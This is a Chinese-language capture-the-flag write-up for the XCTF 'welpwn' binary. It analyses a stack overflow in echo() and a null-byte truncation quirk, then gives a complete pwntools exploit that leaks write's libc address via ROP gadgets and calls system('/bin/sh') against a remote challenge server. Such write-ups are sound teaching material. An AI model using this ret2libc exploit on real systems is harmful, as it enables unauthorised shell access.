welpwn(xctf)

0x0 程序保护和流程

保护：

流程：

main()

echo()

echo函数中存在明显的栈溢出漏洞。

0x1 利用过程

使用x64的通用gadget，泄露write函数的地址。使用LibcSearcher查出相应的libc，得到system函数和/bin/sh字符串的地址就可以getshell了。但是理想是丰满的现实是骨感的，exp写完后一直报错。用GDB查看一下core。发现确实覆盖了返回地址但是后面紧接着是输入缓冲区中的数据。回过去看echo函数，发现在写入s2的时候/x00会被截断，这种截断在写入地址的时候无法避免，但是巧合地是输入缓冲区就紧接着echo返回地址。

如图，0x7fff0048ea90~0x7fff0048eaa0是echo的栈空间，0x7fff0048eab0~0x7fff0048eb48是输入缓冲区。所以如果想要执行gadget只需要连续pop4次的就能使栈顶指向gadget。

0x2 exp

from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
elf=ELF('./a')
write_plt=elf.plt['write']
write_got=elf.got['write']
start_addr=0x400630
gadget1=0x40089A
gadget2=0x400880
pop_rdi_ret=0x4008a3
pop4_addr=0x40089C

sh=remote('220.249.52.133','42405')
# sh=process('./a')
payload='a'*24+p64(pop4_addr)+p64(gadget1)+p64(0)+p64(1)+p64(write_got)
payload+=p64(8)+p64(write_got)+p64(1)+p64(gadget2)+'a'*56+p64(start_addr)
sh.sendlineafter('Welcome to RCTF\n',payload)
write_addr=u64(sh.recv(8))
libc=LibcSearcher("write",write_addr)
offset=write_addr-libc.dump("write")
system_addr=libc.dump("system")+offset
bin_sh_addr=libc.dump("str_bin_sh")+offset
payload='a'*24+p64(pop4_addr)+p64(pop_rdi_ret)+p64(bin_sh_addr)+p64(system_addr)+p64(0)
sh.sendlineafter('Welcome to RCTF\n',payload)
sh.interactive()